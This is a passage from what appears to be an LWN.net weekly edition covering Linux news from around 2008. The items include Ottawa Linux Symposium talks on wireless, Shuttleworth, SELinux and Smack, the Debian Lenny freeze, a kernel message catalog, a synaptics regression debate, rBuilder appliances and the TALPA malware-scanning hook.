unaware of suspend and resume, drivers must work around it by de-registering
and re-registering with it, which can be slow.  Adding support for suspend
and resume 
is on the list, as is supporting power saving modes.


Linville went on to discuss three big issues that are largely outside of
the control of the wireless hackers: firmware licensing, vendor participation,
and regulatory concerns.  Because drivers for Windows come with the
firmware in the driver, many hardware vendors do not license the firmware
blob separately.  This means that it is unclear what can be done with those
blobs.  Certain vendors—Intel and Ralink were specifically called
out—provide liberal licenses for their firmware.  Users are
encouraged to "vote with your dollars" by purchasing devices
that either do not require firmware or that have a clear, free software
friendly license. 


Another consideration when deciding which vendors to support is whether
they are engaged with the community.  For the most part, all vendors but
Broadcom are working with the wireless hackers by providing documentation
and/or source code. Some are even providing
dedicated developers to work on Linux drivers—Intel was the first,
but both Atheros (which just released a driver for its ath9k
hardware) and Marvell have also begun doing that.


Government regulations about what can and cannot be done in the unlicensed
frequencies used by wireless are a concern that is frequently cited by
vendors when refusing to work with the community.  Unfortunately, their
concerns are not completely without merit as hardware vendors are expected
to ensure compliance with the regulations.  "Non-compliance could be
a huge loss" for those companies.  As Linville points out, though,
most vendors find a way to support Linux drivers.


In answer to a question, Linville said that most WiMAX and 3G wireless
devices are Full MAC designs, so there should be little or no regulatory
concern, which, in turn, means that Linux support should not be much of a
problem—at least until Soft MAC devices come along.  Overall, Linux
wireless has come a long way, but there is lots still to do.  One gets the
sense that the wireless team is up to the task.


		OLS: Shuttleworth on free software development


In the third keynote given at this year's Ottawa Linux Symposium (OLS),
Mark Shuttleworth spoke about "The Joy of Synchronicity".  In his speech,
he discussed his idea of synchronizing releases between major
distributions but he also advocated time-based, rather than
feature-based, releases for free software in general.  He believes that a
release has 
value in and of itself; by doing them on a regular schedule, a project will
get into a kind of cadence that is useful for both developers, testers, and
users.


Before starting, Shuttleworth was subjected to the traditional introduction
by the previous year's keynote speaker—James Bottomley, in this
case. Bottomley looked 
at Shuttleworth's postings to newsgroups over the years, noting three
year-long valleys in the graph where there were no postings.  It turns out these
corresponded to events in Shuttleworth's life.  The first is when he
received a substantial amount for selling Thawte to Verisign: "when
someone is being productive on the mailing list, never give them half a
billion dollars," Bottomley said.  For the second, he has a pretty
good excuse as he was not on planet earth; the last corresponds to starting
Ubuntu. 


In a nod to Bottomley and the other kernel hackers, Shuttleworth mentioned that
he had been working on his slides up until close to the start of his
speech, while doing some unrelated things in the background—like updating
his system.  That picked up a new kernel as well and he did a suspend to RAM
when he was done; only later in the cab ride to the Congress Centre did he
think: "maybe that was a mistake".  It turned out to work
just fine, which is a testament to both the kernel and to distribution
update mechanisms.


The alliterative theme of the speech was that free software development
should be guided by "cadence, collaboration, and
customers".   The cadence is a regular schedule for releases, similar to
what GNOME—who pioneered this technique, according to
Shuttleworth—and the Linux kernel 
do.  This gets a project into a rhythm that makes it more predictable,
which enables all interested people to schedule themselves around it.  He
compared this to various development methodologies such as "Agile" and "Lean".


Industries are governed by rules, so if you want to change an industry, you
"have to find which rules are only in our heads".
Cross-project collaboration is one of those rules. "Nowhere is it
written that projects can't collaborate."  It is harder to do that
if each distribution is working with different versions of the various
base-level tools: the kernel, X.org, GNOME/KDE, OpenOffice.org, Mozilla, and so
on. 


Shuttleworth contends that it is releases, rather than features, that bring
attention to Linux.  In answer to critics who believe that distributions
should compete with each other, he says that is just "an opportunity
to create friction."  Free software companies don't compete on
versions, but rather on philosophies and what things they focus on.  He likens
it to food courts or automobile sales malls where there are many choices in
one location which serves to increase the sales of all.


For major transitions, Shuttleworth is a fan of establishing meta-cycles,
the idea that every N releases is a major release, which may result in
breaking some backwards compatibility or introducing completely new
functionality, along the lines of KDE 4 or GNOME 3.0.  As an example, he
used a six month release cycle where every fourth or sixth was a major
release.  For a distribution, that might be a long-term support release,
rather than a major change.


One of the key requirements that Shuttleworth sees is the need to
"keep the trunk pristine", by doing integration on the trunk
and feature development on branches.  Along with this is the need for more
and better tests.  While not necessarily believing in test-driven
development, he certainly leans that way.  In any case, all the tests
should pass before committing to the trunk.


Many projects do not yet have an extensive test suite, but this needs to
change.  He quoted a Chinese proverb that "the best time to plant a
tree is 20 years ago, the second best time is today".  He mentioned
that he is working on a robot that controls the trunk of a development
tree. Developers will request it to merge from a branch, so the robot
merges the branch
and runs all the tests.  If the tests pass, it commits, otherwise it gets
kicked back to the developer.


He sees distributions as "an effective conduit of upstream to
users," to that end he believes that agreeing on versions of vital
infrastructure can only help.  Bugs that users find will be more likely to
be fixed; those versions will also get better testing which will help
developers.  It is a conversation that free software should be having
because it is a "very exciting idea" that won't work for every
project but should be attempted and experimented with.  


In answer to criticism about Ubuntu not contributing as much as other
distributions would in his proposed synchronized release, Shuttleworth was
adamant that it was not true.  He 
hates to see the antagonism and vitriol between distributions. "We
have much bigger fish to fry and they are probably not here today."


If all of the distributions were to standardize on a particular version of
some project for their next release, what happens if that project falls
behind?  There are risks associated with that, Shuttleworth admits, but if
it were happening, more resources would be available to help the project
catch up.  In the worst case, perhaps falling back to the previous version
would have to happen. "Being tightly coupled has risks."


This is clearly an idea that Shuttleworth feels strongly about, not
necessarily that it be adopted fully, but that it be discussed and
considered.  Certainly some of his ideas have a great deal of merit.  We
will have to wait and see whether the grander vision will ever be
implemented.


		Debian Lenny is frozen


The Debian project is gearing up for
the release of Debian Lenny, the next stable release of the Debian
GNU/Linux operating system.  This week we heard that Debian Lenny has been frozen.

What does the freeze mean and when can we expect Debian Lenny to be
released?  To answer the second question first, the release is currently expected in
September.  While the testing branch is very close to what Debian Lenny
will be, there are still Release Critical bugs to squash and other work
that must happen before Lenny is pronounced stable.  This Debian "lenny" Release
Information page gives some pointers to various progress pages where
you can find out more about the bugs that still need to be fixed.

Mostly what the freeze means is that there are no more automatic uploads
from Debian's unstable branch to the testing branch.  Most Debian packages
start out in unstable, also known as sid.  That gives people a chance to
test the packages and report any bugs.  Assuming that these packages are
working well, they will be automatically uploaded to the testing branch
after a certain amount of time.  Now though, testing is frozen, so a
release manager will need to evaluate each unstable package and manually
upload the package to testing, if it is judged suitable for Lenny.  Chapter
5.13.3
of the Debian developers reference covers direct updates to testing, if
you are looking for more detailed information.

When Debian releases a stable distribution the user can be assured that
they are getting a very stable operating system.  All the packages will
interact well with one another.  It will not be the most up-to-date system
available, because stability is considered more important than new versions
of packages.  Many Debian users agree.  Some will continue to run Etch, the
current stable version, until several months after Lenny is released.

If you want a stable system, but need just one or two more current
packages, you might consider building those packages yourself.  Backports.org is another way of getting a
few more current packages for your stable system.  AptPinning allows you to run
certain packages from one version, say unstable, on your stable system.
There will be some risk with each of these methods, as newer packages may
require newer libraries or have other dependencies.  The more you change
your stable system, the more instability you introduce.

The lenny package list will help you find out what packages are currently in Lenny.
Some digging through the sections there will show that Lenny includes
linux-image-2.6-486 (2.6.25+14), dpkg (1.14.20) and hal (0.5.11-2) are
among the Administration Utilities.  The Python section lists python
(2.5.2-1) among the many related packages.  To find out if Lenny has want
you are looking for, just browse through the sections.

		OLS: SELinux from academia to your desktop


One of the nice things about conferences is the ability to catch up on
where a particular project is headed, generally from one of the lead
developers.  Ottawa Linux Symposium did not disappoint in this area, with
several "State of ..." talks.  On day two of the four-day conference, James
Morris looked at SELinux from its academic roots to its plans for the
future.  


SELinux got its start from university research in the 80s and 90s that
recognized that Discretionary Access Control (DAC) did not protect very
well against the kinds of attacks that were becoming prevalent.  This
spawned the idea of Mandatory Access Control (MAC), in which the system
makes all of the policy decisions regarding access, so users cannot change
the permissions on files or other objects at their discretion.
SELinux is a MAC system.


Originally developed by US National Security Agency (NSA) in the 90s,
SELinux was released under the GPL in December 2000.  At the Kernel Summit
in 2001, SELinux was proposed for inclusion in the 2.5 development-series
kernels (remember those?), but was rejected by Linus Torvalds because there
was no consensus amongst the various competing security models.  This is
what led to the creation of the Linux Security Model (LSM) interface.


It was the LSM interface that got Morris involved in SELinux.  It took
until the 2.6 release in December 2003 before SELinux was available in the
mainline, which is about three years after its release.  This is "not
atypical for a significant change to the kernel," Morris said.


The next phase was to get it enabled and working in distributions.  Because
he works for Red Hat, Fedora (Core in those days) was an obvious choice.
FC2 was the first release with SELinux, but it was disabled by default
because the policy was too strict. "Every time we switched it on, we
would find bugs in the applications."  Security bugs that is.


So, Fedora came up with the idea of a "targeted" policy that only affected
network-facing services. This was released as part of FC3—which
formed the basis for Red Hat Enterprise Linux (RHEL) 4.  It was an attempt
to get 
SELinux "switched 
on and doing something useful".  It worked well enough that it
inspired confidence in the technology by proving it was viable.  SELinux
developers realized that "if we run into problems, we can fix
them". 


Since 2005, SELinux has emerged from a research orientation to a tool that
is usable—with a very active development community.  "Even
being part of the project, it's 
hard to follow all that goes on" in the SELinux community.  Morris
then outlined some of the more significant developments over the last few
years. 


The development of the reference policy by Tresys was a tremendous addition
to SELinux.  It was a "step forward in policy thinking"
because it provides a framework around which to design policy.  By getting
rid of the original "spaghetti code" policy, it "made policy much
more understandable to policy developers".


Loadable policy modules broke up the monolithic policy that was originally
part of SELinux into separate pieces.  Each can then be loaded individually
based on "policy booleans".  The two of these together allow policy to be
built and administered in sensible chunks, as well as allowing sites to
"customize policy to support local conditions".  Because of
library and toolchain improvements, you no longer have to dig through files
to edit, compile, and load policy either.  Many of the reputation problems that
SELinux has stem from the early days when it was well nigh impossible to
track down policy problems and fix them.


It is this frustrating user experience that SELinux is trying to tackle
these days.  The targeted policy is being merged with the "strict" policy
and hundreds of modules covering different applications have been added.
Policy failure—where the policy is written incorrectly causing a user to
be unable to do something they should be able to—is "something
you don't want the user to know about", but unfortunately that is
unworkable.  Because the system is under development, bugs will occur;
there is nothing more frustrating for a user than to be denied access but
to be unable to figure out why.


That is where setroubleshoot can help.  Inspired by GNOME's bug
buddy, it alerts the user to policy violations and tries help find the
cause of the problem—to the point of suggesting possible fixes.  It
is somewhat dangerous, in that users may blindly follow the fixes without
understanding what they are doing, but it helps psychologically.
"Instead of a black box stopping your system from doing what you
wanted, now you have a transparent box."


System administrators have a much nicer set of tools to manage policies as
well as filesystem labels. audit2why can analyze SELinux output to
provide reasons, once again with possible fixes, for policy violations.  It
is "not the optimum way to develop policy," but it can help.
In addition, semanage is the "go to tool" for managing SELinux
that is becoming 
quite powerful.


Policy development has several GUI tools that have become available.  SLIDE
is an Eclipse plugin that assists in policy development.  It also includes
support for testing and deploying policies. Hitachi has developed
SEEdit, which is a tool that provides a simplified policy language
specifically targeted at embedded devices.  It is a higher-level language
that removes much of the complexity from SELinux policy while still
compiling into compatible policy files.


Performance and scalability have been two areas that have seen much work
over the past few years.  Many performance and memory reduction patches
have come from Japan 
from the work on embedded SELinux.  On the performance critical path, RCU
has been used to eliminate some locking, while caching values rather than
recalculating them has also provided better performance.


One of the areas that the SELinux hackers are most excited about is threat
mitigation.  "We have seen evidence that SELinux has provided
protection for normal desktop users."  Tresys tracks these kinds
of threats in their SELinux Mitigation News.  In the final analysis,
this is what SELinux is meant to do, so it is gratifying to see concrete
results. 


SELinux has been adopted widely in Fedora and RHEL, but plans for the
future include making it available on other distributions.  Ubuntu is
shipping SELinux in addition to AppArmor, while Debian and Gentoo are
targeted for better SELinux support.  SELinux techniques are being pushed
beyond the kernel, into virtualization (XSM), the desktop (XACE), storage
(Labeled NFS), and applications like databases (SEPostgreSQL).  There is
also a push into other operating systems, like the OpenSolaris Flexible MAC
project. 


The challenges facing SELinux in the future are in areas like usability,
which is a "fundamental problem in security", and
documentation, which is "not very good, in some ways really
bad".  Morris also wants to keep the community of users and
developers growing.


While SELinux has had a difficult path—first in getting into the kernel at
all, then to becoming usable, and finally to actually preventing the kinds
of attacks it was designed to stop—the developers seem to overcome each
hurdle.  It is a complex beast, that in some ways defies analysis, but it
can help to protect systems.  Like it or hate it, it seems likely to be
with us for a long time.


		OLS: Smack for embedded devices


The Simplified Mandatory Access Control
Kernel (Smack) is a Linux access control mechanism akin to SELinux.  As
its name would imply, it is a much less complex scheme that requires far
fewer resources than SELinux, which may make it more palatable to
developers of embedded systems.  Smack developer Casey Schaufler gave a
talk at the recent Ottawa Linux Symposium (OLS) outlining how it could be used
for embedded devices.


Smack has the distinction of being the second user of the
Linux Security Module (LSM) kernel interface to be merged into the
mainline.  This finally put to rest the idea that the LSM might some day be
removed from the kernel,
requiring all security solutions to be implemented 
in terms of SELinux.  But Smack comes at Mandatory Access Control
(MAC)—which is at the heart of both SELinux and Smack—from a
different perspective.  Schaufler believes that MAC rules should be
explicitly specified rather than implicit in a set of policies a la SELinux.


In order to get everyone up to speed, Schaufler gave an overview of MAC and
Smack.  The main thing to remember about MAC is that it is not user
controlled.  The system makes all decisions about access and the attributes
of files that govern access.  The standard UNIX model, by way of comparison,
is a Discretionary Access Control (DAC) system, where users can change the
security attributes of objects under their control.


Smack relies on labels for subjects, which are active
entities, and objects which are passive.  An access is then an operation
that is performed by a subject, generally a task/process, on an object,
which is typically a file.  In order to determine whether the access
succeeds or fails, Smack compares the subject and object labels, if they
match access is granted, if they do not match, the explicit access rules
are consulted.  If one matches the attempted access, it is granted,
otherwise it is denied.


There are three system labels defined, along with access rules governing
their behavior, but all other rules must be explicitly added by the
administrator.   Labels are simply strings up to 23 characters long.  Rules
then specify a subject label, an object label, and a desired access (read,
write, execute, append).  After mounting a smackfs filesystem at
/smack, rules can be written to /smack/load, which stores
them in the kernel for immediate use.


It is important to note that objects inherit the label of the subject that
creates them.  That means that the label on an executable is only relevant
to determine whether the subject process is allowed to execute it.  The
process that gets created has the label of the subject that executed it,
not the label associated with the executable file. The same goes
for processes that create files, those files get the label of the process.
This is very different from the SELinux label inheritance rules.


There is more to it, of course, but not a lot more, which is what
makes it attractive to some.
Interested readers are directed to our article, Schaufler's
OLS paper [PDF], or the Smack home
page for more detailed looks at Smack.


Schaufler outlined specific reasons that a simplified system, like Smack,
would be attractive in the embedded world.  Many embedded devices are
single-purpose and geared towards one user.  Because cost is often a major
factor, the device only needs to implement the exact set of functions that
it is meant to provide.  As Schaufler puts it: "feature
completeness is uninteresting".


Cost often plays a role in the amount of system resources provided,
particularly RAM and flash, as well.  A solution that uses less memory fits
well 
with the embedded mindset.  There have been some efforts to pare down
SELinux and its enormous policy file for the embedded world (including a paper
at OLS [PDF], and a presentation at the Embedded Linux Conference that we covered briefly), but it is
still rather large.  It is also a great deal more complex than Smack, which
was a major thrust of Schaufler's presentation.


One problematic area for putting SELinux on embedded devices is that most
flash filesystems do not have support for extended attributes (xattrs).
Both Smack 
and SELinux use xattrs to store labels for files, but Smack can provide a
default label for an entire filesystem to avoid requiring xattr support.
Also, system files automatically default to the "_" (called floor) label so,
in many cases, labels on individual files may not be required.


In his talk, Schaufler gave several examples of specific sets of
applications and how they could be easily cordoned off from each other
while still working together.  The model he used was of a mobile phone with
multiple applications.  The phone's system data would have the default
floor label which means they can be read—but not written—by a
process with any label.


One of Schaufler's examples was of two different applications that
each retrieved content from the network to display to a user.  Each
retrieved headlines from different services, one from CNN, the other from
ESPN.  At times the content might overlap, in which case the phone vendor
wanted each to be able to read the other's data, potentially displaying a
sports story as part of the regular news or vice versa.  This is easily
handled by two Smack rules:


Assuming that the CNN application runs with the CNN label, and the ESPN
process with ESPN, they can each read and write their own private data
(because the labels match).  Because of the two rules above, they can also
read each other's private data.  If at some point, the phone provider
decided those two applications should not be able to share data, those
rules simply need to be removed, no filesystem relabeling or anything else
is required. 


Another example that Schaufler gave was of a video process and an audio
process that cooperated in sharing system resources by sending messages to
each other.  They had no need to share data, just to send UDP messages.  In
Smack, a process can send a UDP packet if it has write access to the label
of the other process.  So the following Smack rules could be used:


One might expect that giving write permission would allow Video, for
example, to write to data with the Audio label.  This is not the case
because UNIX file semantics require read access in 
order to write file data (because the inode of the file must be read).  So
under this set of rules, each can send (and receive) UDP packets from the
other process, but cannot access any of the data labeled for the other
process.


Schaufler had some other examples in his presentation (slides
[PDF]), that were geared more towards exploring Smack capabilities than
specifically at embedded applications.  He concluded by directly comparing
Smack and SELinux in terms of complexity.  Clearly Smack is vastly simpler;
whether it has enough capabilities to provide the protection that embedded
developers require remains to be seen.  On the other hand, whether SELinux
can be made to work reasonably in embedded environments is also an outstanding
question.  It will be interesting to watch.


		A kernel message catalog


Kernel developers will often use printk() to output a message when
something goes wrong.  Such messages tend to be helpful to kernel
developers; if nothing else, they can be used to find the place in the
source where the message is emitted, and that, in turn, is most useful for
somebody trying to figure out what the message is really saying.  So, if
your kernel tells you, for example, "lguest is afraid of being a guest," a
quick dig through the source turns up a comment reading "Lguest can't run
under Xen, VMI or itself.  It does Tricky Stuff."  Problem solved - or, at
least, understood.


But, for the bulk of Linux users and administrators, the act of
printk() interpretation by recourse to the kernel source is,
itself, Tricky Stuff.  If the kernel cannot tell them directly what the
problem is, they would much rather have a more straightforward means
of translating messages into some sort of useful English.


Or maybe not: for many Linux users, English may not be much more helpful
than straight kernel-speak.  It would be really nice to translate those
messages into some sort of useful French, or Chinese, etc.  What it comes
down to, in the end, is that printk() alone will never be able to
provide sufficient information to users in a way which can be understood
and used to solve problems.


Just over one year ago, LWN looked at some proposals for
adding structure to kernel messages.  After that, the discussion went
quiet, to the point that it seemed like not much was happening in the
messaging area.  But one should not forget that we are dealing with
companies like IBM which have been creating massive binders full of kernel
message documentation for several decades.  They're not going to give up so
easily.  So the posting (by  Martin Schwidefsky) of a new 
kernel messaging proposal is not an entirely surprising event.


In the latest scheme, each source file which generates structured messages
defines a macro KMSG_COMPONENT as a string naming the specific
subsection.  This name will often match the name of the module which is
created from that code, but that is not necessarily the case.  The name,
once chosen, is supposed to remain fixed forevermore; it becomes, in
essence, part of the user-space interface and should always match the
documentation.


Then, each message is assigned an integer identification number.  The
combination of the component name and the message number should be unique
throughout the kernel; it is used by various tools to associate a more
detailed explanation of whatever the message is intended to communicate.
The message number is used with one of a number of new
printk()-like functions:


The "_dev" versions take an additional struct device
argument (like dev_printk()) and encode the device name in the
resulting message.  That message (for all variants) will include the
component name and the message number in any output.  So, for example, the
S/390 "xpram" driver includes the following:


Should this particular error check trigger, the resulting message will look
like this:


Thus far, our user is probably not feeling much better informed than
before.  But there is additional information which is made available
and associated with that message tag.  In this particular case, it looks
like this:


Here, we have a more verbose description of the message.  Even more
helpfully (one hopes), there is a discussion of what can be done to make
this message go away.  This information can be provided within the source
or in a separate documentation file; it can also, presumably, be nicely
formatted and distributed to paying customers as a binder for the system
administrator's bookshelf.  It can be translated into other languages for
Linux users worldwide (and beyond: one could have a lot of fun with the
Klingon translation for this kind of material).


The patch includes a script (written in Perl with undocumented messages, of
course) which (when invoked with make D=1) will go through
the source and make sure that every kernel message has an associated
description block; it can also format the descriptions into man pages if
desired.  There are checks for missing descriptions or overloaded message
ID numbers; the script does not, at the moment, check for a change in the
message text.


Martin's first posting made this work specific to the S/390 architecture;
following a suggestion from Andrew Morton,
he made it generic in later versions.  The cost of this work is zero for
those who do not use it, so there is a reasonable chance that it will find
its way into the mainline eventually.  Before the message catalog system can be truly
useful, though, developers will have to go through and document a
substantial portion of the messages created by the kernel - and keep that
documentation current as the kernel evolves.

		Can user-space bugs be kernel regressions?


Adding new functionality to the kernel while maintaining the interfaces for
user space is the standard kernel development practice.  Sometimes, though,
that can tickle bugs in user-space programs in unpleasant ways.  When that
happens, it is clearly a regression—something that worked before no
longer does—but is it a kernel regression?  In the end, it doesn't
matter, it seems, because the kernel needs to change to keep the user-space
program working, even at the expense of "ugliness".


Clearly for
purely internal kernel functionality, there is no
mandate for compatibility across kernel versions.  But, when the user-space
interface is involved, things get a bit trickier.  A change that
alters the way a documented interface works is essentially never done;
user-space interfaces are maintained forever. 
When new functionality properly uses a documented interface, but breaks a
user-space program, it gets
murkier.  


That situation came up recently when Andrew Morton noticed that the linux-next tree broke the X
server on his laptop.  The problem was quickly diagnosed as a problem in
the Synaptics touchpad driver for X.  An array that was being passed to an
ioctl() was sized based on the number of bits, rather than bytes, it
should contain.  Thus the maximum buffer length passed was off by a factor
of eight.

 
As a solution, Dmitry
Torokhov offered up a patch, not to kernel
code, but to the synaptics X driver.  That didn't sit
particularly well, with Morton and others, eventually leading to a pronouncement from Linus Torvalds:

If somebody has the commit that broke user space, that commit will be 
_reverted_ unless it's fixed. It's that simple. The rules are: we don't 
knowingly break user space.


Torokhov clearly felt that it was the driver, not his changes, that were at
fault, which is entirely understandable because it's true.  That doesn't
alter the fact that new kernels would break existing, working
configurations on laptops everywhere.  The kernel change just fully used an
existing, documented interface as Torokhov explained: 

It is not like we broke ABI here. The program (synaptics driver) had a
grave bug. Older kernels happened to paper over the bug because they
did not fill the whole buffer that was advertised as available. Now
that we have more data to report the bug bit us.


Declaring an array of 64 bytes, but telling the kernel it can store up to
511 bytes into it is obviously a bug.
But, as Morton points out:

It really really doesn't matter what the causes are or which piece of
code is at fault or anything else like that.

What _does_ matter is that people's stuff will break.  Apparently lots
of people's.  That's a problem.  A _practical_ problem.  Can we
pleeeeeeze be practical and find some way of preventing it?


Since the code was in linux-next, it was targeted at the 2.6.28 kernel.
In Torokhov's thinking, this would allow something approaching six months
for distributions to update the synaptics driver.  But that is a fundamental
misunderstanding of how and when kernels are upgraded—it is not only
by way of distributions.  Introducing a change like this would result in
many messages to linux-kernel from unhappy folks with broken X servers.


Kernel hackers purposely build and run kernels on a wide variety of
hardware and distributions.  That includes older distributions that no
longer get updates so they would be stuck with the buggy driver, thus
non-working X server, essentially
forever.  Obviously, they could rebuild the synaptics driver—kernel
hackers have been known to compile things other than kernels—but that
isn't the point.


There are major benefits to also having lots of regular users update their
kernels 
frequently.  Trying to ensure that there won't be any unnecessary barriers
to doing that can only help.  Torvalds describes it this way:

And if we want to encourage people to upgrade their kernel very 
aggressively (and we absolutely do!), then that means that we have to also 
make sure it doesn't require them upgrading anything else.


Torvalds and Torokhov worked out a fix that preserved the old behavior for
a specific passed-in buffer length, while allowing the new events to be
delivered to any other users of the ioctl() that passed in the
proper length.  Torvalds commented:
"Yeah, it's not pretty, but pragmatism before beauty." 


It is, to some extent, a gray area.  Regressions are bad for any number of
reasons, but maintaining hackarounds for buggy user-space programs has its own
set of problems.  The hope is that eventually the need for the workaround
goes away so that it can be removed.  It would seem difficult to determine
when the last user of the old synaptics driver finally upgrades, so this
code could be with us for a long time.  Given the alternative, the
price seems worth it.


Though Torvalds was absolute in condemning any known regression,
even for programs that are clearly misusing an interface, there must be a
line somewhere.  If some obscure program, with few users, gets broken by
the kernel doing something documented and reasonable, it is hard to imagine
that this kind of workaround will be required.  This particular problem was
relatively easy to decide, the next might not be.


		Building custom appliance distributions with rBuilder


Linux distributions can be a pain.  Users have to go through the whole
process of installation, configuration, and updates, and, often, all they
really want to do is to run a single application.  The vendors of that
application, meanwhile, feel the need to support as many distributions as
possible, even though the actual system running underneath their code is
nearly irrelevant.  Wouldn't it be nice if users could simply get their
desired application as an "appliance" which comes with all the necessary
component parts nicely hidden inside?


As it happens, rPath has been in the appliance business for a little while
now.  Recently, the company has made its appliance-building infrastructure
available to free-software products in the form of rBuilder Online.  In essence,
rBuilder can be used to create and maintain a custom distribution oriented
around the delivery of a specific application.  The result is a
"software appliance" which, in theory, makes the given application
available in a self-contained, standalone distribution.


There are a number of example appliances available on the site.  They
include:


 Bongo, an attempt to
     revitalize work on the Hula mail client

 Gallery, a standalone photo
     album

 LochDNS, a DNS	
     server

 Openfiler, a storage
     management system


There are several others oriented around content
management systems, telephony applications, database servers, and more.
All told, quite a few projects have shown interest in creating software
appliances for their applications.


Your editor grabbed a copy of the Openfiler appliance and installed it onto
a spare box which had been cluttering up the office.  Appliances from
rBuilder start out looking like a Fedora system; they use the same Anaconda
installer.  The installed system also shows a lot of Red Hat heritage, such
as /etc/sysconfig, various system-config-* commands, an
/etc/inittab file which credits Mark Ewing and Donnie Barnes,
etc.  But there is  a crucial difference: there is no rpm command.  Instead,
these appliances are based on rPath's Conary package management
system, which takes a very different approach to the software management
problem.  But there are still similarities with Fedora: your editor
attempted a conary updateall operation on 
the LochDNS appliance, only to see it fail with a set of file conflict
errors; it was almost like running Rawhide again.

 
Appliance users are not supposed to have to dirty their fingertips with
command-line administrative operations, though.  To help them avoid this
fate, rBuilder-based appliances come with the rPath
Appliance Platform Agent, otherwise known as a web-based administration
interface.  Once the user gets past the usual set of obnoxious Firefox
dialogs ("this site has an SSL certificate which is not only unknown, but
is almost 
certainly hostile and is ugly besides"), this interface provides a
set of administrative screens for standard tasks (networking, updating the
system, etc.) along with some specific to the Openfiler application.  


In theory, it should be possible to manage one of the appliances without
ever going to the command line - or even knowing that the command line
exists.  In practice, how well that works depends a lot on how the
administration screens are designed.  In the Openfiler case, quite a bit of
clicking around in circles was required, but your editor did finally
succeed in setting up a volume based on a USB key, perform a software
update, and shut down the system at the end.


The creation of appliances would appear to be relatively straightforward;
details can be found in this
document.  One creates an account in the rBuilder system, then puts
together a file describing which components (packages) are necessary in the
final system.  Those components will presumably include at least one
application provided by the appliance builder - that application being the
reason for the creation of the software appliance in the first place.  The
"rMake" system will then pull all of the pieces together, bring in any
needed dependencies, and wrap it all up inside a 
minimal distribution; the resulting system image seems to run at about 300MB.


There are several possible output formats, including the Anaconda-based
installation CD image; the rPath folks would appear to have put a lot of
effort into making appliances work on a number of virtualization platforms
as well.  Appliances can be built for VMWare, various forms of Xen,
VirtualIron, and Microsoft VHD.  Notably absent is anything based on Lguest
or KVM.  Even more notably absent is any kind of live CD appliance;
anything not running in a virtual machine must be installed onto the host
system's disks.


rPath's Conary servers seem to be set up to handle software updates.  It is
also possible to obtain source for the packages found in an appliance
through the rBuilder site, though one must do a little digging first.
Both of these features are important: anybody creating a distribution-based
appliance has to arrange for updates and source availability somehow.  One
assumes that most appliance creators have no real desire to get into the
broader distribution business, so it's nice for them to be able to offload
these tasks.  Anybody distributing these appliance images should note that
rPath does not appear to have undertaken any obligation to continue to
provide these services in the future.  Should rPath decide to stop, some
interesting questions on who is ultimately responsible for satisfying the
source-availability provisions of the GPL could come up.


Naturally enough, rPath offers commercial services for those who would like
stronger guarantees about long-term support, or who want to include
proprietary software in their appliances.


For the time being, this approach to software distribution would seem to be
most useful for companies which are in the business of building real,
hardware-based appliances.  Distributing software in virtual machines has
the look of a new and truly impressive form of bloat; even "just enough
operating system" is a lot of baggage for an application to drag around.
For situations where one wants to try out a complex system, appliance
distribution may be worth its cost, but one would probably not want to get
every application this way.


There may be value, though, in software distributions which can run almost
anywhere, and which can be nicely isolated from the outside world.  Locking
network-exposed applications - server processes or web browsers - into
their own little world could help to avoid a lot of security problems in a
way which seems more straightforward than SELinux or containers.


But, perhaps most interestingly, the appliance approach could eliminate a
number of distribution-compatibility issues by putting many more people
into the distribution business.  Now anybody can throw together a
special-purpose distribution without having to deal with all of the
plumbing that makes the whole thing actually work.  Something interesting
will certainly come of this idea, even if it's hard to say just what that
might be at the moment.

		The TALPA molehill


The TALPA malware scanning API was covered here in December, 2007.
Several months later, TALPA is back - in the form of a patch set posted by a Red Hat
employee.  The resulting discussion has certainly not been what the
TALPA developers would have hoped for; it is, instead, a good example of
how a potentially useful idea can be set back by poor execution and
presentation to the kernel community.


The idea behind TALPA is simple: various companies in the virus-scanning
business would like a hook into the kernel which allows them to check for
malware and prevent its spread.  So the patch adds a hook into the VFS code
which intercepts every file open operation.  A series of filters can be
attached to this intercept, with the most important one being a mechanism
which makes the file being opened available to a user-space process as a
read-only file descriptor.  That process can scan the file and tell the
kernel whether the open operation should be allowed to proceed or not.  In
this way, the scanning process can prevent any sort of access to files
which are deemed to contain bits with evil intentions.


There are a few other details, of course.  A caching mechanism prevents
rescanning of unchanged files, increasing performance considerably.  There
is also a hook on close() calls which can trigger the rescanning
of a file.  Processes can exempt themselves from scanning if it might get
in their way; scanning can also be turned off for specific files, such as
those used for
relational database storage.  But the patch set is relatively small, as it
really does not have that much to do.


This capability could well prove to be useful.  Even if one is not
concerned about malware infections on Linux systems, a lot of files
destined for more vulnerable platforms can pass through Linux servers.
There is also the potential for the detection of attempted exploits of the
Linux host.  Normally, in the Linux world, the way we respond to knowledge
of a specific vulnerability is to patch the problem rather than scan for
exploits, but there may be systems which cannot be restarted on short
notice, and which could benefit from an updated scanning database while
running code with known vulnerabilities.  Also, as Alan Cox pointed out, this feature could be
useful for entirely different objectives, such as efficient indexing of
files as they change.


What might be best of all, though, is that this hook could replace a number
of rather less pleasant things being done by anti-malware vendors now.
Some of these products use binary-only modules, plant hooks into the system
call table, and generally behave in unwelcome ways.  Moving all of that to
a user-space process behind a well-defined API could be beneficial for
everybody involved.


The patches have gotten a generally hostile reception on the kernel mailing
lists, though.  Some developers  are
uninspired about the ultimate objective:


	So you are going to try to force us to take something into the
	Linux kernel due to the security inadequacies of a totally
	different operating system?  You might want to rethink that
	argument.


That's an objection which can be worked around; the kernel developers do
not normally want to determine which applications will or will not be supported by
the system as a whole.  

Another objection, though, might be harder: this hook is said not to be the
best solution to the problem.  Instead of putting a hook deep within the
VFS layer, the anti-malware people could simply hook into the C library
(perhaps with LD_PRELOAD), put the malware scanning directly into
the processes (mail clients or web servers, say) which are passing files
through the system, or embed the scanning into a stackable filesystem
implemented with FUSE (or a similar mechanism).  That has led to
counterarguments that scanning implemented in this manner could be evaded
by a hostile application - by performing system calls directly, for
example, instead of going through the C library.  Certain kinds of attacks,
it is said, could get around a purely user-space solution.

That argument, however, highlights the real problem with this posting.  The
patch includes a set of 13 "requirements," including intercepting file
opens, caching results, exempting processes, and so on.  But none of these
requirements describe the problem which is really being solved.  In
particular, as noted by Al Viro and others,
there is no description of the threat which this patch is intended to
mitigate:


	Various people had been asking for _years_ to define what the hell
	are you trying to prevent.  Not only there'd been no coherent
	answer (and no, this list of requirements is _not_ that - it's
	"what kind of hooks do we want"), you guys seem to be unable to
	decide whether you expect the malware in question to be passive or
	to be actively evading detection with infected processes running on
	the host that does scanning.


If the scanning host could be infected, then a scanning mechanism which
